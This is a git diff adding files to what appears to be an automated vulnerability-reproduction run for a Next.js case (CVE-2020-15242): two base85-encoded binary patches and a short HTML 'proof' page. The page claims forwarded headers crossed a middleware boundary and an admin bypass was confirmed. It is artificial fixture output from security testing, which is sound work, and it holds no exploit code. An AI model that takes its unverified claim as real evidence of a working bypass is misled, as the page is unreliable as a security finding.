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
CZa@71

literal 0
HcmV?d00001

diff --git a/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/proof-dom.html b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/proof-dom.html
new file mode 100644
index 00000000..cc0474ba
--- /dev/null
+++ b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/proof-dom.html
@@ -0,0 +1,26 @@
+<!DOCTYPE html><html lang="zh-CN"><head>
+  <meta charset="utf-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1">
+  <title>Next.js Proxy Boundary Fixture - proof</title>
+  <style>
+    body { font-family: sans-serif; background: #0f172a; color: #e2e8f0; margin: 0; padding: 32px; }
+    main { max-width: 900px; margin: 0 auto; background: #111827; border: 1px solid #334155; border-radius: 16px; padding: 24px; }
+    .proof { padding: 14px; border-radius: 12px; background: #14532d; color: #dcfce7; }
+    .baseline { padding: 14px; border-radius: 12px; background: #1e3a8a; color: #dbeafe; }
+    code { background: rgba(255,255,255,0.08); padding: 2px 6px; border-radius: 6px; }
+  </style>
+</head>
+<body>
+  <main>
+    <h1>Next.js Proxy Boundary Fixture</h1>
+    <p>Middleware trust-boundary fixture with forwarded-header proof.</p>
+    <div class="proof">Proof active: trusted forwarded headers crossed the boundary</div>
+    <p>System: <code>nextjs</code> / Family: <code>proxy-boundary</code></p>
+    <section id="admin-proof">Admin boundary bypass confirmed.</section>
+    
+    
+    
+    
+  </main>
+
+</body></html>
\ No newline at end of file
diff --git a/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/proof.png b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/proof.png
new file mode 100644
index 0000000000000000000000000000000000000000..f778b4f883ac4210566efa564df50e9a8fe80997
GIT binary patch
literal 37208
zcmeFYXH*l>yElp=B7&eGDqW>Xm)=1|Ksti-DiC@vp%YOQ>C!t$uc3$D6e*$i5+IRY
z6QmOe;T`_xo_jvt`|(}xy=$@70NFE>nZ4(Eer>`u)fMmErM*i)KyXj#-CHdJ0wUno
zo1=Gb0-IM%$~OoI?h`1zef_~FV|S4-U?GyJcYhK+>Xqp<U;jTpc@Ck?msb^Y@r&U`
zu#Gu9w$;0`-Cc?IG4f!DuPTy~3wnJxg3c>RmFvS35HLI?AiUms1{087Z%2u4zP#SP
zdVHtzdP`vPf9!xD3y_nOlclADjf0bejirNwon6886+<Za_%yslMZHD!y!AvWyuCFj
zD2UF8Z#+SXE5v-<+uU41qn9w89glgLP`-^#zW)9kz+RoGuHV1M5!1TL60v!+M)R|&
z>FJV^fu4R>rZ*mTb1RqE-8~u_@8?wi9Aai7BMu4J*x4z&KHU}H;NW2H+lUAJ?g_~n
z*?#`-7sn(?=il)^+)VkBXL&U1hHMWwK-WfG&m0crc5yPbcx<!~5>_y`IHeOD{os=q
zk7@2785vU-GpYUk6J21~rz>qF(v(-7>A8IL@_n9j8yg!UKY4;_KBW%cY?($eH}PA*
zD9>NV^N+h#!ya*o(C9bZ>6BReyZHiUHqLkbS$Egs5Td82zbDBf=NN7rjMq0bm{auf
z^gA^KmLh@Y`pWzadGr`Jx9`(v#s{B{UjP^8Vk&igb^;T>L!8?}2nqEj#SMM$T!onZ
zskQi`mX_-)*o+HpnQs{3eV?bO{ZsIk`C{1e<|b}G^FN=>7E$cwzGWrYA-|z-R$dMb
zY;6k+45S8jd(|5d7`O_u0~Nf|xYK!V;bgh8)N_fsK3n(V&{WT~ZgAH9PsiOo)5D9I
z|5?f}7{3uX7X8;~OB)rUC%{lmGHP?tIceRW>{2*oGe<{Of|l#K`-Jgzy<3OB-hX_&
ze|}!&KUb&$js%_RUmy1RPlD!G1h=oZn>TM<ABx~7=`Hi??I+&<f589aeF#xPwl?L>
z&X)}pjbwPapIhZ_Ncp;pzYWV3F>CWfcMs_Gn{_WNv^p=QC35LC`W~L_&K;WJhxcP>
z1QqJb4L)ygZ>?c5X#dpUJyeI@5vSL7f)XXW$XFM<&Bl(Xa}XF?zS%ij%{)<{k|z>F
zBaGkNr|L)bOiznI@KU--y1#a>^5Q2_1vm14ArPfOZ4zt!$xVL8=fG)@t-jX};;mqU
z$d{?&mNluVsR-OIHsWBdEN#<wp)od=SzaqWna4;t=(p9HY~r)PW;#(9?Ah6^+A9w2
z9%}9%X0%!?8m7%3;2BMKUv#L=R4@!A@L~s$3kwUCrY$lM{BvQF&HhOaDvR!L;NMnQ
znIN3!-_D$w3X~=uvNo8-Q=0b$K`;C9<{DoDyT&ldiXw3bWJ6<^h?K5AmPW8}bud<q
zHjZ7zu-S88$~XMQ5=*#Tf^Bp(1(OWWC_1l5J&5kGlPve{Ojbh=dLzsq=Qt!s_r@^k
zw+DRu^X|cyt6w*<hjv3EBGc4dN!oaa`g)O?9a-<;qhP`d&O4El=y*0Y?g78?Kh<~f
zdwn+=>E~+gT|hg$rc(4bs~mL)l6b`2Z8bXDr5_Ry{DXuLME;x1SL(`FihlvAr(!1;
zvj3n_CQqDQSy{P1ufZhC0g1HN;ff7b<1(!K!R<|SWoA`&baW)(yt1^O6B6a9e7HU|
znDVR*>_<vKaMtmQWAu(jO^28_=4iS5>SDZ@M2qsno3+{Mm9KZHKcr`7n&4pr+|p7~
z$x!`*Hepf02u2>mU9oBb>%OO7ZJ~jQ{nUl(>HBcF!B}?LOhu((({y8$WnFO?B@4H4
zo%!Gs{<<XeJj|fR>g(r@U!Ubw)K34cPtn0X?jbMN29n>WqabJZPwq|dmwo}N5MJZK
zrw79pZ)1=hkiDfYIaeMOD%Y}zQM|^+Vf5$8*N9}ja{WA<5whK1)T=-86PgvSktJ2H
z`RgWPo-K-2Jxxk&EIX8f3B3SgH@|q0*Aq=Ep6@s}zHQ{-P}b<S(u$kMv=_?B$jAg&
z90qUCK>kH%wm8gG1Z__?2|G+**Q3|W1k5;{N?qT9b*G&64b9beu?Ooz46?6rz?^1F
z_@1Qih_1!BVQ@sgshiK#GiFP)3RKfrs=pQ#6ovK{sOVJ~w-w?TDJdnuyFtr;e!Y9p
zVFu55E?@K0FZwZGMM5Qd*Rj&9!|i0(7gFRws-iNWnkrbRl8zV{*f`n}yb=|~(+F9G
zJo+SGkufLggnVS1eKkej_d~{{-q8S9)O;rG0jHSDPZ2##4s<)MzV1aD$qGp;a~_XB
zUrH;tHo9r$tH!?k7$7Mr>Ee<-Q8aAa;U<`pJ(R#Nx6Vy7G&C5KE#|d{3|yn|I9Rpw
z<$$D{IVVC6Vx9rbm*eKk-`T0DbCERhq>nkMadg~eey14S0(Vv;Bf6EOii(QfnC$Jb
z+RA<8QutcLc%d3pWT2tWd2viES;50|q1rMpYUp&S_3B^F+pvR;5r&4Us(+_ZiWGY~
zbXl^H_c<0`-TCW7>2(hCT2AfmSo@ViXk^QD@q3s~nY9+d=_v;vA79B6?;XU>VKQI8
z%fGX+_@k|f(xDnzsL1YOEssLvp5=I*!H$HNeG;dE@kL)OvtmISv<<3RZCsgUa%u9A
z$3tgbX&#)JE$#2TAd~OW?vnl5V?%w$Z*$SVGpp_5Qtfm3OLh&$I#{(1${E$}(b@S?
zS#00+^oOuwOUhxq$J3(kp|<2NWJgT5mL^LC@qX9OadRDtNx9ByD;yqw&*Rn2lcw6<
z$)v0-)273RX#yZ)e1LD%2t1k3q}das3Bm~!sGRJeROm(?@uVqVZ48?^E;fI$h$~MO
zcF+YLpES1ta<tJvFGvkDTAjY%Zzq+7!C>Sgl1yOsZp(kdCPgwO8z7hKQD6&f*^Enn
z5|sWQU5h7XwCbY?Y;Isc(kwW)=4k>d&!DykJs*gA;(}^7DspCqVJA!E5X#3xQ?L*4
zyJqb{Q!+ZOKCy0=iuNus43hXUcvBoI6CIiS4k+-vCQ=0=-g{#koxxqK$`9!zts4>R
zOL@IhrBnN&G9}tY#xVCV#O^w#a4}Khtr6%SgzN^vtM9H<+#%^uqXvhe_qnq%jM7qP
z*-?&6zAN9RyzFO=8oJo?4Rvzgj+sb`DvI_e5#A=(!JTM--L2Hf5*S9D_pZoo45qSW
z3taW)hkX<K2m%$f3o|xO$C%t|F^kHxaIl0PGYNvZSJYLKhxbsGdYwmQXWb+v5{y!f
zM%ym^E^Hua*stknUAie#=@yzj8`4^c_2)@S;Gi-Ao1LE;ZpBlusiv6kBzdW&3kf+h
zjf+F@zvW5%4b$0VDb#e@-^|?sKd1{LXOzed$>uf?q(k*@B4F9}Sve_${Uf!a&Ka{e
zIwpPGpU=)+3ceDA7DPoI4>P3SebmR~`qgov5x=byY>Y=VXvB==g<|P6w#=q0c+zLm
zjBepAd8rzm(FgTThUY3Bh+YuBuiq|UPhw?1p`ghTdz0s~6tmb?dHmGD>*r}(nPzqQ
zbWD8w#GXpWbHln~+4cIdZ&FSOdT3z&_XkBIDfwP;L_!v4_n~F<cb*9QeGU-$s}W*x
z#P!h$)VPY|-;Sw_z&z<QhSgOaoj%Zc+0g$3|KujYr~A(cm=|^zU^8c)C@t2AwV`y$
zl<Y+5Gb_02qKpJktSFz<wOs)Pl12}1wFkzXy|=HO%+$(%SK$>GuJ%(e^c%C%<5U6b
zmy0p^e~3t}xjJ4iv&jC2UlLOgp8Q}_EBz_c;<q-w(B%H&b-eVkdL}~YQqzHIT%50<
zl#rO*o~J;JZLSN|Fj=Op;(%X2M~~*@DT~2>$Sl^CP}MbzWOevl;oICOfZM&qs%{Q9
zV2v0=)drj&ZyA*7{;+xRPBU3fJs3<Y>F3j*!0|BNYAr*GqtE6ot47kKS$dwL#*^%Y
zu|h9Wi1a&_==IIwHj}pVjwW93wf?D|B6cfyMv3y;UHij2yOpSwwZA#c0KS3ZB2*m{
zpI!0;sQcOP>u!fefMs0Glfe$lBvcC2oW|S9-Ap7udRhi37^Tu)y7fn;i^j94FI2s5
zdoF*slv;|$aSyq8am-YHQt!FdpZk?m=~6k+sMtLC_g7M6vsa6DFBtI?2{{{u`n$k<
zH-;CJlD-*&;Bnn`jL{5|Tie^EXC@0}AxZm$!9X8<%xxU7d{zP!Qmej{cAJ<AB|J%S
z%{=G+-U+%zSuA!=z<Tfw`lh+t<+&HtWy?h-SvmSt<;hFrND{Wnd}&;cIOc5xM!(*%
zq(70<Hq)@)w%Ho(hsKXT%RJOB8XB+oo#>WycVp1N113}OmZMhQzr|+c2J31#HCG(3
z2`w6$n(F)K&V${&x6x0QdI#M+JoaY1f9w~%ktY5f(Oge23)Z4^jCiC5pptU0Z6s_0
ze;GPy9VVeurZX-9e`DP7@vvgipGnF`v)uN9LGR6^yE<+wJsev3KTdSnTrbauh{+k7
zJuXa791YGXHW|2dRbkq>Z%I7X`rXzC#i=a0dfCdkp&_B6z1<PXH8vxK^?dp-J33^H
z>K#jkRX&(Hdr};l$E}dJfSm;vHNJe~!7&WqDRycZCZ^aOud(O|Y9nV7XCq#(i`Byo
zOC#&OLWSsOA$_X+xJfH`nv!I?oOK#b`3c*fnT^#gL1mxA2Ayx1-unQ?WV-QWX$$Bp
zgty6PB*7u)y7qzEMXE0YgDtEs`i9bk$C1kSnm%@|+aIzPaV7Jbl$ew$WXmj0iBPI2
zM9~(R^v%@#>?iI0Z!JJARF2r&fyDKwIEN`y#=tPhtPC{LVmC33=yngplgP5F;AbPy
z6E1&kl1G$h#l+r@rFo-~g8nA~FzhOPLZ@_E0_@mPe`Qkrrb+XbIR^&jaIxZNId>!a
zfuO=dqnn`hJC}?AD?jf&<m1izR_rY{l|i8tbev_|N=;fvJBt^+M4`OA*=0JFhbL&s
zZcT-tr>{59_O(}fqBT$JK}qVgvV}^u(}q{i(hjwZ{LlVXCt*rIKyB$i72q5K!ViwN
za!TR{=%X{Fn!*?{$hMh$C9V~fS6yPnztz{ZrtD!;q>+`VMvkciFNb7@DTJ+T=0B8P
zdV_%8JZ#T>`Oj&YmZ;-wz}e_nrlcrwT5y@(g_~DJK$X^7nhUa32gN8IlpD}(-y6L<
zBa_1HKmGG&RY0lIgf5?H>j&KM%JKew5N>rVt{e3@mkfXl78fU%V(#y&%w?e11#Cpz
zVd9T?;RR0$Fu1<IvTv**35uvRZhvPI9fy3(m*ya4RTPsg;k{KLvNzXa*7nL|dkGQz
zg-+D@WD{$YRmI?1MmBJbY3{J82P=rhOTSz3zqtm_oIn*g;}iJwbmyBM*LdtzhE6$5
z+xeqw(q~)csi5(@i}g+uN~DHhFt}%CE}BMgA0A)Szjq4Xik~*FaNJ^xqO(nY(BBBh
zpN@Xao1FPAKalVv-jkhG7|mMnhC_XQFm}jnoksR!O&aQ^{a7xvIU9Pm#ye*>oGu!(
z-%CtJzr9x*XA{jRUD!61vQ^~KDkrhA!Ka@u+#C6TIc&^sUZ)IS?4;bblPuge8f)I<
zyy#xyVej-Cm=x!Ubtk-YrLg;?7}VgPss0gMAs^Neuoa#Zq{Ac=lp*Qz@uyj}`&4tq
zqF)q^q}~4V8c;At>zNa|{}?s6IJjsRlHu-rPI$%2S+=Fe|8RVfWz@7iKt3F2C>upL
zHIoJ!65?$gNx>Tp<0#tGMV*JT1kL=@#oV5wOTD^c)7GJKewFS2DF5fqa(3Q<Fi3jK
zy8Fa{OE#)Le#w7CJ1PBRf-bX(Q*xRCL8N6BpBq1&vAsb`Tkx*Nbt%qzi1y;555TIr
zS4JAQq&+aL;O6q(4lrh+-LkhHz!T!&-9P8|(ygwHO#Am(UVCl~OTU&*JHuf~Z!mRR
z(QjCd*-9?=C`4sx7HhtS85DBae;{VhD`v_S@38E}+_?0gzx0qSo`xD7ZBLoeTBVRs
zv5oo}wXz5i-+9;}{`A*iV^mYq*H!uzM9t)-h_k*<$H!VD(R(F)yB<#?>u>qcPQV;w
